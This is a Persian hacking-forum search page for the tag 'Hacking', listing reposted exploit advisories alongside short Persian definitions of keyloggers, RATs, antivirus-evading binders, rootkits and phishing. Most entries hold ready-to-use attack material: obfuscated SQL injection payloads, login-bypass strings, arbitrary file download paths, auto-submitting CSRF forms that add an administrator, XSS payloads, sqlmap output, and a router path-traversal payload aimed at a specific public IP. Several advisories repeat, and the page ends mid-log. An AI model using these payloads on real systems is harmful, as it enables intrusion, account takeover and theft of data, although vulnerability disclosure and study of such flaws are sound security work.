امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند



iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

699 نتیجه پیدا شد

  1. Hacking

    # # # # # # Exploit Title: Joomla! Component RPC - Responsive Portfolio 1.6.1 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://extro.media/ # Software Link: https://extensions.joomla.org/extension/rpc-responsive-portfolio/ # Demo: https://demo.extro.media/responsive-joomla-extensions-en/video-en # Version: 1.6.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL] # # Etc.. # # # # #
  2. Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 27.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Version: 2.7 # Category: Webapps # Tested on: windows 7 / mozila firefox # supporting tools for testing : No-Redirect Add-on in firefox # --!> # ======================================================== # # # admin panel Authentication bypass # # Description : An Attackers are able to completely compromise the web application built upon # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without # prior authentication! # # Proof of Concept : - # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php # Step 2: Access http://example.com/path/admin/index.php # # # Risk : Unauthenticated attackers are able to gain full access to the administrator panel # and thus have total control over the web application, including content change,add admin user .. etc # # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  3. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  4. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  5. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  6. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  7. Hacking

    ترکیب فایل‌های مخرب کیلاگر و رات‌ها با فایل‌های دیگر برای مخفی شدن از آنتی ویروس‌ها و فعالیت بدون درد سر در سیستم قربانی را بایندرها بر عهده می‌گیرند.
  8. Hacking

    رات‌ها از کیلاگر‌ها وسیع تر هستند و حتی امکان ارسال تصویر از مانیتور و یا حتی وصل کردن مهاجم به کامپیوتر قربانی را بر عهده دارند. ممکن است یک نفوذگر ابتدا با کیلاگر دسترسی‌هایی بر سیستم قربانی بیابد و سپس یک رات را روی آن سیستم نصب کند.
  9. Hacking

    همانطور که از نام کیلاگر مشخص است کیلاگر به برنامه مخربی گفته می‌شود که وظیفه ذخیره کلیدهای فشرده شده روی کیبورد و ارسال آن‌ها به شخص نفوذگر بر عهده دارد. شما تقریبا تمام اطلاعات مهم را با استفاده از کیبورد به کامپیوتر خود می‌دهید، یوزرنیم ها، پسوردها و آدرس ها. شخص نفوذگر به منظور سرقت اطلاعات شما یک کیلاگر را بدرون سیستم شما می‌فرستد تا اطلاعات شما را برباید.
  10. Hacking

    یک پروتکل تحت شبکه برای سرویس گرفتن و سرویس دادن است. نفوذگران از تلنت برای بررسی باز بودن پورت‌های حیاتی استفاده می‌کنند.
  11. Hacking

    هرچند که RootKit ها را از برخی نظر‌ها می‌توان مانند BackDoor‌ها و یا تروجان‌ها دانست ولی از تروجان‌ها و بک دورها بسیار خطرناک تر اند. روت کیت‌ها پس از نفوذ به سیستم علاوه بر وظایف تروجان‌ها و Backdoor‌ها خود را جایگزین بخش‌های مهمی از سیستم عامل حتی هسته آن می‌کنند و دسترسی‌های مهلک و بعضا غیر قابل شناسایی به نفوذگران می‌دهند. اولین روت کیت‌ها در سال 1990 شناسایی شدند و از آن زمان تا کنون روت کیت‌های متنوعی برای سیستم‌های عامل لینوکسی و ویندوزینوشته شده اند، هر چند تعداد RootKit‌هایی که برای سیستم عامل لینوکس نوشته شده است بیشتر از ویندوز است. یکی از انواع RootKit‌های معروف در لینوکس خود را جایگزین برنامه /bin/login می کنند و یک پسورد ریشه به این برنامه می‌افزایند. اکثر روت کیت‌ها خود را جایگزین برنامه‌های زیر می‌کنند: DU Find Ifconfig Login ls Netstat ps البته خطرناک ترین نوع RootKit آن نوعی است که خود را جایگزین هسته سیستم عامل می‌کند، چون دیگر هسته سیستم عامل را بدست گرفته است و حتی روی عملکرد نرم افزارهای اسکن ویروس و روتکیت هم تاثیر می‌گذارد و به سادگی آن‌ها را غیر فعال و بی خاصیت می‌کند. با روت کیت‌های سطح هسته شخص نفوذگر می‌تواند تمام عملیات و فعالیت‌ها را به صورت کامل و بی درد سر ذخیره و شنود کند. از مهم ترین روت کیت‌های سطح هسته لینوکسی می‌توان به Knrak و Adore اشاره کرد که می‌توان آن‌ها را از اینترنت دانلود کرد.
  12. Hacking

    حملات فیشینگ را می‌توان از حملات مرتبط با حوزه مهندسی اجتماعی دانست. شخص نفوذگر با استفاده از فیشینگ شروع به سرقت اطلاعات از حجم عظیمی از کاربران می‌کند. یکی از حملات معروف فیشینگ ارسال ایمیل‌های جعلی از سمت بانک است. بدین نحو که یک نفوذگر ایمیل جعلی از سمت یک بانک را برای تعداد زیادی کاربر ایمیل می‌کند و در آن یک لینک قرار می‌دهد که به جای هدایت به صفحه اصلی بانک کاربر را به صفحه‌ای مشابه صفحه بانک هدایت می‌کند. کاربر پس از دیدن صفحه‌ای مشابه صفحه بانک و وارد کردن یوزرنیم و پسورد خود در دام هکر می‌افتد. در برخی حملات فیشینگ نام کاربری و رمز عبور هزاران کاربر بانک به سرقت می‌روند. البته فیشینگ به سرقت اطلاعات از طریق مکالمات تلفنی یا پیام کوتاه نیز اطلاق می‌شود. به این معنا که گاهی نفوذگران با تماس تلفنی سعی در تخلیه اطلاعاتی کاربران دارند.
  13. Hacking

    در دهه‌های پیش پریکر‌ها بیشترین جولان می‌دادند. پریکر‌ها به شبکه‌های تلفن نفوذ می‌کنند و مکالمه‌ها را استراق می‌کنند. این پریکرها ممکن است پروژه‌هایی را برای سازمان‌های مخفی و خلافکار اجرا کنند، بنابراین پریکر بودن یک جرم است و پریکرها در تمام نظام‌های حقوقی جهان محاکمه و مجازات می‌شوند. البته برخی از پریکر‌ها نیز تنها برای خود کار می‌کنند و از دانش خود برای تماس مجانی استفاده می‌کنند.
  14. Hacking

    واکر به نفوذگر کلاه سیاهی گفته می‌شود که به منظور سرقت اطلاعات وارد سیستم‌های دیگر می‌شود. مثلا یک واکر بر اساس سفارشی که می‌گیرد وارد سامانه ثبت احوال شده و اطلاعات محل سکونت یک شخص را در اختیار خلاف کاران می‌گذارد.
  15. Hacking

    # # # # # # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities # Dork: N/A # Date: 29.08.2017 # Vendor Homepage : http://mvc.net.pl/ # Software Link: https://github.com/andrzuk/FineCMS # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: sohaip-hackerDZ # Author Web: http://www.hacker-ar.com # Author Social: @sohaip_hackerDZ # # # # # Reflected XSS in get_image.php Technical Description: file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded. Proof of Concept(PoC) http://your_finecms/application/lib/ajax/get_image.php?folder=1 POST: id=1"><script>alert(1)</script>&name=1 Arbitrary File Modify Technical Description: The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell. file /appalication/core/controller/template.php line50-line53 follow function save() file /appalication/core/model/template.php line26-line48 if file exists, we can modify it whihout any limit. insterestingly, there are two more Vulnerability for same function in different files. file /appalication/core/model/style.php line26-line48 file /appalication/core/model/script.php line26-line48 Proof of Concept(PoC) http://your_finecms/index.php?route=template http://your_finecms/index.php?route=style http://your_finecms/index.php?route=script POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz Authenticated SQL injection all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database. Technical Description: file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded. file /stat/get_stat_data.php line30 the sql inject into sql_query and execute. Proof of Concept(PoC) http://your_finecms/index.php?route=excludes&action=add POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep. Stored XSS in images.php FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: when we upload the file file application/core/controller/images.php line87 and follow the function add() file application/core/model/images.php line78 if filetype startwith "image",the filetype will insert into database when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages. Proof of Concept(PoC) view the http://your_finecms/index.php?route=images&action=add and upload picture modify the picture's filetype view the detail of picture Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages. http://your_finecms/index.php?route=images&action=edit&id=15 view the detail of picture Stored XSS in visitors.php FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: just like last vulnerability. Proof of Concept(PoC) visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  16. Hacking

    # # # # # # Exploit Title: Smart Chat - PHP Script 1.0.0 - Authentication Bypass # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://codesgit.com/ # Software Link: https://www.codester.com/items/997/smart-chat-php-script # Demo: http://demos.codesgit.com/smartchat/ # Version: 1.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin.php # User: 'or 1=1 or ''=' Pass: anything # # http://localhost/[PATH]/index.php?p=smiles&handel=[SQL] # # '+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+- # # Etc... # # # # #
  17. Hacking

    # # # # # # Exploit Title: FTP Made Easy PRO 1.2 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/ftp-made-easy-pro-php-multiple-ftp-manager-client-with-code-editor/17460747 # Demo: http://codecanyon.nelliwinne.net/FTPMadeEasyPRO/ # Version: 1.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin-ftp-del.php?id=[SQL] # http://localhost/[PATH]/admin-ftp-change.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  18. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  19. Hacking

    # # # # # # Exploit Title: Easy Web Search 4.0 - SQL Injection # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164 # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/ # Version: 4.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL] # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL] # # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''=' # # Etc.. # # # # #
  20. # # # # # # Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download # Dork: N/A # Date: 30.08.2017 # Vendor Homepage: http://www.joomanager.com/ # Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/ # Demo: http://www.joomanager.com/demo/realestate # Version: 2.0.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE] # # Etc.. # # # # #
  21. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin) # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: inurl:controller=pjAdmin # Date: 30.08.2017 # Homepage: https://www.phpjabbers.com/invoice-manager/ # Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin # Version: 3.1 # Category: Webapps /php # Tested on: mozila firefox # # --> # ======================================================== # # # Invoice Manager v3.1 Cross site request forgery (Add Admin) # # Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be # tricked to visit a crafted URL created by attacker (via spear phishing/social engineering). # Once exploited, the attacker can login as the admin using the email and the password in the below exploit. # # # ======================CSRF POC (Adding New user with Administrator Privileges)================================== <html> <body> <form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post"> <input name="user_create" id="user_create" value="1" type="hidden"> <input name="role_id" id="role_id" value="1" type="hidden" > <input name="email" id="email" value="[email protected]" type="hidden"> <input name="password" id="password" value="12341234" type="hidden"> <input name="name" id="name" value="Ali BawazeEer" type="hidden"> <input name="phone" id="phone" value="911911911" type="hidden"> <input name="status" id="status" value="T" type="hidden"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> # =================================================EOF ======================================================= # # # Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin # and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data.. # # # Remedy : developer should implement CSRF token for each request # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  22. Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 # Date: 29-08-2017 # Exploit Author: Jithin D Kurup # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 # Vendor : www.dlink.com # Version: Hardware version: B1 Firmware version: 2.01 # Tested on:All Platforms 1) Description After Successfully Connected to D-Link DIR-600 Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's Admin Panel Just by adding a simple payload into URL. D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password. Its More Dangerous when your Router has a public IP with remote login enabled. IN MY CASE, Tested Router IP : http://190.164.170.249 Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ 2) Proof of Concept Step 1: Go to Router Login Page : http://190.164.170.249:8080 Step 2: Add the payload to URL. Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd Bingooo You got admin Access on router. Now you can download/upload settiing, Change setting etc. ---------------Greetz---------------- +++++++++++ www.0seccon.com ++++++++++++ Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith
  23. Hacking

    ----------------------------------------------------------------------------------- |<!-- # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 29.08.2017 # software link : https://www.codester.com/items/469/user-login-and-management-php-script # demo : http://froiden.cloudapp.net/LoginDashboard/index.php # Version: 3.04 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) admin dashboard authentication bypass Description : An Attackers are able to completely compromise the web application built upon the user login and management php script as they can gain access to the admin panel and manage other users as an admin without authentication! Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php Risk : Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users , including add admin user .. etc |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password > exploitation < <html> <body> <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> |-----------------------------------------EOF-----------------------------------------
  24. Hacking

    1. Advisory Information ======================================== Title: Brickcom IP-Camera Remote Credentials and Settings Disclosure Vendor Homepage: http://www.brickcom.com Tested on Camera types: WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af Remotely Exploitable: Yes Vulnerability: Username / Password / Settings Disclosure (Critical) Shodan Dork: title:"Brickcom" Date: 14/12/2016 Authors: Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar) Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio- lizaso-9ab73359) Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston- emanuel-rivadero-858b9ba) 2. CREDIT ======================================== This vulnerability was identified during penetration test and Research by Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero. 3. Description ======================================== Brickom Cameras allow a low-privilege user to disclose every configuration in the NVRAM, including credentials in clear text, remotely by making a simple requests. This vulnerability, coupled with the fact that there are two default users with known passwords which are rarely modified, allows an attacker to disclose the admin password and latter every config. The most Critical API call is users.cgi?action=getUsers, which provides every user credential. Many other API calls to get information for the WIFI password or FTP credentials, even the whole configuration, are affected depending on the camera model. On the hardware side, the UART console of some models (example: WCB-040Af, with baudrate 38400) is exposed in the PCB and after soldering the corresponding pins and connecting, the resulting shell has root access. A simple NVSHOW command will list every config available in clear text, including credentials. 4. Proof-of-Concept: ======================================== Using the following GET request: curl http://<IP>:<PORT>/cgi-bin/users.cgi?action=getUsers -u user:pass -v Request: ---------- > GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1 > Authorization: Basic <BASE64 user:pass> > User-Agent: curl/7.35.0 > Host: <IP>:<PORT> > Accept: */* > Response: ---------- < HTTP/1.1 200 Ok < Server: mini_httpd < Cache-Control: no-cache < Pragma: no-cache < Expires: 0 < Content-Type: text/html < Connection: close < size=3 User1.index=0 User1.username=admin User1.password=admin User1.privilege=1 User2.index=1 User2.username=viewer User2.password=viewer User2.privilege=0 User3.index=3 User3.username=rviewer User3.password=rviewer User3.privilege=2 5. SOLUTION ======================================== The vendor has been contacted and the firmware was updated. See disclosure in: https://www.brickcom.com/news/productCERT_security_advisorie.php
  25. # Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6 # Date: 2016-09-16 # Exploit Author: Larry W. Cashdollar, @_larry0 # Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/ # Software Link: # Version: 1.0.6 # Tested on: Linux # CVE : CVE-2016-1000124 # Advisory: http://www.vapidlabs.com/advisory.php?v=170 # Exploit: • $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" • • • (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] • sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests: • --- • Parameter: #1* ((custom) POST) • Type: error-based • Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) • Payload: page=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • • Type: AND/OR time-based blind • Title: MySQL >= 5.0.12 time-based blind - Parameter replace • Payload: page=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2 • --- • [13:30:39] [INFO] the back-end DBMS is MySQL • web server operating system: Linux Debian 8.0 (jessie) • web application technology: Apache 2.4.10 • back-end DBMS: MySQL >= 5.0.12 • [13:30:39] [WARNING] HTTP error codes detected during run: • 500 (Internal Server 